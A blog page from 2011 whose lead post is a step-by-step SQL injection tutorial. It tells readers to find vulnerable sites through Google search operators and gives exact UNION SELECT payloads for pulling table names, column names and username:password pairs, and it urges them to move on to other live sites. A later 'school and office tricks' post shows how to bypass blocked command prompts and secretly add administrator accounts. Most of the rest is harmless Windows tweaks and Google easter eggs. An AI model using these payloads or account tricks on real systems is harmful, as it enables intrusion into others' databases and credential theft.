Sunday, 27 November 2011

HACKING WEBSITES USING SQL INJECTION ATTACKS ON VULNERABLE SITES,,,!!!


Warning: This is only for EDUCATIONAL purposes to make you aware of the vulnerabilities that may be present in your website so that you may self test it in your OWNED website to IMPROVE the SECURITY ,,,,,!!! The person posting this or the this blog is not responsible for any type malicuous activities performed by anyone else,,,,!!!

This is what they basically teach you when you go for certain HACKING COURSES which I have taken pains for hours to put this to you without even earning a penny and sharing it for FREE,,,,!!! Atleast some comments and feedback from you will make me Happy ^_^

So Guyzzz I have now decided to post some serious ADVANCED LEVEL OF Hacking stuffs which is how the "Cracker" breaks into your Vulnerable Websites,,,,!!!
All you need to know is a bit of SQL queries,,,!!!
It doesnt matter even if you are not an expert in
So here we go,,,

What is SQL Injection?
So let me give you some idea of what I am going to talk about,,,,There are many complex defenitions you may get in various other sites,,, But I put it in simple terms,,,, You type some SQL queries or codes [or whatever you wish to call it ;D] on the address bar[whee you type the web address of sites to be searched] to test vulnerable website,,,,!!! If you find it vulnerable then BINGO,,,!!! we will use some more SQL injection queries to crack it,,,!!!

So guyzzz who are related to computer science stream,,, If you found learning SQL boring this is one way to make yourself interested in ;D

And as far as others are concerned,,, please dont worry i'will be giving you some codes which you may use to Test the Vulnerability of the site,,,!!!

QUICK STEPS TO FIND THE VULNERABILITY OF WEBSITES,,,!!!
Step 1:
Search for any of the following terms in Google:

inurl:product.php?id=

inurl:index.php?id=

inurl:news.php?id=

inurl:shop.php?id=

inurl:shop.php?pid=

inurl:newsroom.php?id=

Step 2: Now for example say there is a website that you found in Google search say for example
www.rahulswebsite.com/index.php?id=7
Open the website in a new tab,,,!!!

Step 3:
To test if your selected website is vulnerable:
Add the ' (single quote symbol) after the site as follows
www.rahulswebsite.com/index.php?id=7'
and now Hit the "Enter" Key,,,!!!

If there is any type of "MySQL error" !!!BINGO,,,!!!
Then it means your target website is vulnerable.

STEPS TO HACK INTO THE WEBSITE AFTER FINDING THE VULNERABILITY

Step 1:
After finding the vulnerability of your target site, use the ORDER BY command to extract the number of columns in the database.
Ex Code:
http://www.anywebsite.com/index.php?id=7 ORDER BY 1--

Doing ORDER BY 1-- should always return the original page with NO error.

Step 2:

Then do ORDER BY 2--

If this shows the original page with NO error, continue.

Now try ORDER BY 3--
and so on,
If this shows the original page with NO error, continue.

Step 4:

Continue increasing the ORDER BY number until you reach an error. For example, if doing ORDER BY 10-- returns an error, then there is a table which has NINE (9) columns, NOT 10. Always subtract ONE from the number that produced the error.

STEP 5:
Next step is to use UNION & SELECT

After getting the number of columns, let's say we have NINE columns. Then you have to type the following code:


Code:

http://www.anywebsite.com/index.php?id=7 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--

You should see a page with a few numbers scattered throughout it. If so, continue,
IF NOT, try the following in which we have to add the " - "hypen or negative sign in front of the id value of our website:

Code:

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--

At the end if this produces the scattered numbers, continue, if not, STOP!!!
Choose anyother target website from the GOOGLE search and repeat the vulnerability test,,,!!!

Step 6:

Now we use the database() command

After you see the scattered numbers, pick one to exploit. Say the numbers on my page are TWO and SEVEN. I will choose the number TWO. After choosing your number, put database() in place of it in your URL as shown below. REMEMBER, I chose number TWO.

Code:
http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,database(),3,4,5,6,7,8,9--

That should return some text in place of the scattered TWO. WRITE THIS TEXT DOWN, and move on.

Step 7: We use group_concat

This is where everything gets a little trickier! This is also the part where you will be extracting data. Yeah! Bingoo!!! :D :D *** Fist punch ***

After extracting the name of the database using database(), type this where you typed database() in the previous step.


Code:
http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--

TYPE THIS EXACTLY AS IT IS SHOWN, and press enter.

In place of the scattered TWO, you should see a LOT of text separated by commas. These are called tables. The text varies by website, but you usually want to look for things like "admin," "staff," or "users." Choose the one that interests you. For this tutorial, I will choose "users." Now type this:


Code:

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()--

OR

if you want the columns from ONLY one table, use this (courtesy of dR..EviL):


Code:

http://www.anywebsite.com/index.php?id=-7UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name=< table name goes here in hex or ascii format >--

This should return even more text. These are called columns. Again choose what interests you, but for this tutorial, I will choose "username" and "password."
The columns "username" and "password" contain the data we want to extract. To extract the final data, meaning, in this case, the usernames and passwords of all the users, type this:

Code:

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(username,0x3a,password,0x3a),3,4,5,6,7,8,9 from users--

Where it says "username,0x3a,password,0x3a" is where you would the name of your chosen COLUMNS, such as username and password, DO NOT replace the 0x3a, ONLY the username and password area. Where it says "from users--," replace "users" with the name of your chosen table such as the one "users." All of this will produce even MORE text in this format:

Code:
admin:thisismypass:,
The comma separates each set of data.

THE END OF MY TUTORIAL
HOPE YOU LIKED IT CHEERS :) :) :)

Saturday, 26 November 2011

Easy way to Change Windows7 Log-On Screen Back Ground,,,,!!!

I have previously described in Detail how to Change the Log-On Screen Background in Windows 7 ,,,, To View my previous post Click Here



Here is yet another quick Step method for the class of lazy guyzzz who hate reading long posts like me ;D


If you do not like the Windows 7 login screen, you can change it as shown above by trying this simple hack.
Here is how you can do it.

1. Launch the Windows Registry Editor by typing Regedit in Start Menu

2. Go to ‘HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\Log ​​onUI\Background‘.

3. Double-click the DWORD value called ‘OEM Background’ to open it and enter 1 in the Value data field.

Note: If the DWORD ‘OEM Background’ is not there, you need to make it.

4. Browse to the background image that you would like
use on the log-in screen. A JPEG file that is less than 245 kb in size can only be used here.
5. Copy the image you want to use into the ‘%windir%\system32\oobe\info\backgrounds‘ folder. If the folder is not present, you need to create it.

6. Rename the image to backgroundDefault.jpg

7. Restart your computer to check the new login background screen.

BINGO,,,!!! :)

Reduce the delay time of Windows 7 thumbnail preview

Windows 7 users know that thumbnail preview of taskbar items is a very cool feature.
You can view the thumbnail by hovering the mouse over the respective taskbar item.
However, you may notice that sometimes, the previews do not appear quickly.
Here is a hack to fix the taskbar preview delay time.

1. Launch Windows Registry Editor by typing regedit in Start Menu

2. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

3. Right click in the right-hand pane of Windows Registry and select New -> DWORD Value.

4. You need to name the new DWORD as “ExtendedUIHoverTime”

5. Double-click on the created DWORD to open it.

6. Select “Decimal” under “Base” and enter the delay time (in milliseconds) in the “Value data” field.

7. Click OK

Windows 7 God Mode

The Windows GodMode features lets you view all the control panels in a single folder.




All you need to do is create a new folder by the following name: GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}.
After it is done, the icon of the folder will change to the control panel icon and when you open the folder, you will see all the control panel options inside it.

Windows 7 registry tweaks




Aero is a very cool and beautiful user interface of Windows 7.
To run Aero, you need a PC with specs like 1 GHz CPU, 1 GB system memory and 128MB of video RAM.
If your system is low on specs, you won’t be able to use Aero.
Here is a workaround for enabling Aero on systems that have low specs.

1. Launch Windows Registry Editor by typing Regedit in Start Menu

2. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM

3. Right-click on the right-hand pane and create the following three DWORD entries and set value for each one:

Animations – set value to 0.

Blur – set value to 0.

UseMachineCheck – set value to 0.

4. Close the Registry Editor

5. Go to the Start Menu, enter “cmd” and press Enter to open the Command Prompt.

6. Type the following commands:

Net Stop uxsms and then press Enter

Net Start uxsms and then press Enter

7. The last step is to right-click on your desktop and choose: Personalize/Windows Colors.

SOME AWESOME TRICKS THAT CAN BE USED IN SCHOOLS,COLLEGES & OFFICES ;D ENJOY,,,,!!!

A lot of schools/offices block the cmd box or run box.I'm about to show you how to get it back !

Make your own run/cmd box

Step 1.Open notepad.

Step 2.Type command.com

Step 3.Go to file then save as your desired name followed by .bat
so for example bob.bat

Remote shut down !(only works on your local network)

Step 1.Go to your cmd / run box

Step 2.Then type shutdown -i

Step 3.Endless amusment !!

Awsome matrix trick (to impress)

Step 1.Open notepad.Step 2.Type this below
@echo off
color 0a
:flag
echo f 6 j 8 d h l 7 b k g i d j h d 6 l h n m f i h k f s 8 5 b j f
echo h 5 j k v 7 k v 4 d h 8 l 9 b g d j 6 k 0 d c n y 6 g j f h c y
goto flag
Note ! The numbers and letters above can be random as long as its 0-9
or a-z ( no special charachters like )

Step 3.Save this file as your desired name followed by .bat
for example Matrix.bat

How to make a creepy chatbox !

Step 1.Open up notepad or right click on the desktop and create => new text document.Step 2.Type the following ...
dim fname
fname=inputbox ("your text goes here ! ")
fname=inputbox ("your text goes here ! " & fname)

ok so for my example consider the Following :

dim fname
fname=inputbox ("Hi i'm Rahul whats your name ?")
fname=inputbox ("How are you feeling ? " & fname)
fname=inputbox("Oh thats nice ! ")
fname=inputbox("Any way got to go bye ! " )

So i would open it up and it would say hello im george whats you name?
say if i typed bob and pressed enter it would say how are you feeling bob. <== thants what the & fname is for at the end. Create a new user with out any one knowing !

Step 1. Go to your cmd/run box

Step 2.Type net user followed by your desired user name then your password then /add

Step 3. For example
net user Daz HF /add
the Daz is the user name the HF is the password .

How to make any user an administrator !

Step 1.Go to your cmd/run box.

Step 2.Type net localgroup administrators followed by the user mane then /add

Step 3.Example : net localgroup administrators Daz /add
Daz the user name.

IS YOU COMPUTER TOO SLOW,,,,,!!! Here Are Some Solutions,,,,!!!

Temporary files

Step 1. GO to run then type %temp%

Step 2. Delete all these files they are all temporary and unimportant !

Step 3. Do this on a regular basis

I surgest using ccleaner its free and very effective at clearing out your junk

Step 1. Right click on my computer and go to properties.

Step 2. Click the advanced tab and click performance.

Step 3. Tick the box Adjust best for performance.

How to put a password on your files ( using win rar)



Here are some simple steps that allow you to Password Protect your Win RAR Files:



Step 1. Right click on your file and click add to archive

Step 2. Go to the advanced tab and press set password

Step 3. Put in your desired password then make sure that you have the 'encrypt file names' box ticked. And the show password unticked.

Step 4. You now should have your password protected file !
Enjoy privacy now ;)

Some more Google "I'am Feeling Lucky" Tricks

Try these as well in your I'm Feeling Lucky Search,,,

1. Google nazi
2. Google loco
3. Google l33t
4. Google gothic
5. Ewmew fudd
6. xx-klington
7. xx-piglatin
8. Google bsd
9. Google linux
10. Google easter egg
11. The answer to life the universe and everything
12. xx-klingon
13. xx-pirate
14. xx-hacker
15. xx-bork
16. find chuck norris

EVERYTHING YOU NEED : A-Z Command List of COMMAND PROMPT (CMD)

a
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
ATTRIB Change file attributes
b
BCDBOOT Create or repair a system partition
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
c
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
CMDKEY Manage stored usernames/passwords
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSCcmd Client-side caching (Offline Files)
CSVDE Import or Export Active Directory data
d
DATE Display or set the date
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DISKPART Disk Administration
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSACLs Active Directory ACLs
DSAdd Add items to active directory (user group computer)
DSGet View items in active directory (user group computer)
DSQuery Search for items in active directory (user group computer)
DSMod Modify items in active directory (user group computer)
DSMove Move an Active directory Object
DSRM Remove items from Active Directory
e
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EVENTCREATE Add a message to the Windows event log
EXIT Quit the current script/routine and set an errorlevel
EXPAND Uncompress files
EXTRACT Uncompress CAB files
f
FC Compare two files
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR /F Loop command: against a set of files
FOR /F Loop command: against the results of another command
FOR Loop command: all options Files, Directory, List
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations
g
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line
GPUPDATE Update Group Policy settings
h
HELP Online Help
i
iCACLS Change file and folder permissions
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
k
KILL Remove a program from memory
l
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer
LOGMAN Manage Performance Monitor
LOGOFF Log a user off
LOGTIME Log the date and time in a file
m
MAPISEND Send email from the command line
MBSAcli Baseline Security Analyzer.
MEM Display memory usage
MD Create new folders
MKLINK Create a symbolic link (linkd)
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MV Copy in-use files
n
NET Manage network resources
NETDOM Domain Manager
NETSH Configure Network Interfaces, Windows Firewall & Remote access
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
o
OPENFILES Query or display open files
p
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
POWERCFG Configure power settings
PRINT Print a text file
PRINTBRM Print queue Backup/Recovery
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory
q
QGREP Search file(s) for lines that match a given pattern.
r
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Registry: Read, Set, Export, Delete keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files
REPLACE Replace or update one file with another
RD Delete folder(s)
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUN Start | RUN commands
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
s
SC Service Control
SCHTASKS Schedule a command to run at a specific time
SCLIST Display NT Services
SET Display, set, or remove environment variables
SETLOCAL Control the visibility of environment variables
SETX Set environment variables permanently
SFC System File Checker
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SLMGR Software Licensing Management (Vista/2008)
SOON Schedule a command to run in the near future
SORT Sort input
START Start a program or command in a separate window
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
t
TASKLIST List running applications and services
TASKKILL Remove a running process from memory
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TLIST Task list with full path
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file
TypePerf Write performance data to a log file
u
USRSTAT List domain usernames and last login
v
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label
w
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WINRM Windows Remote Management
WINRS Windows Remote Shell
WMIC WMI Commands
WUAUCLT Windows Update
x
XCACLS Change file and folder permissions
XCOPY Copy files and folders

Top 12 Google "I'm Feeling Lucky" Tricks

1. Google Gravity : This will make it the Google page on your computer screen a zero gravity zone. You can also direct the texts using your mouse and throw them all over the screen. Sounds great, right? ;)

2. Google Sphere : Using this Google hack, all words on the Google page will start flying in the circular motion.
... ...
3. Google Loco : If you wanna see the Google jumping and dancing then, this one is for you ;)

4. Annoying Google : It will really annoy you as it will convert the alphabets in upper case and lower case randomly.

5. Epic Google : Using this trick , the size of the texts keep increasing and finally it will come out of your screen.

6. Google Gothic : If you are a metal music lover or just into gothic stuff then this is the best Google trick for you.

7. Google Pacman : Hope that you guys remember that Pacman was the Google Doodle for two days and removed later. But if you still wanna play Pacman on Google homepage anytime then you can do that using this trick.

8. Who's The Cutest : Wanna know who is the cutest person? , Just give this Google hack a try and you will come to know.

9. Google Pirate : Take a look on the Pirate version of the Google ;)

10. Google Hacker : What if someday Google is hacked? Try this trick to have an idea of that situation.

11. Google Rainbow : This trick will create the rainbow effect on the Google pages. It is also very annoying as texts are hard to read using this trick.

12. Google Reverse or Google Reverse : Using this trick , you will land on a page where everything is the mirror image and in the reverse order of the Google homepage.

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Host
Make Flying Twitter Bird Gadget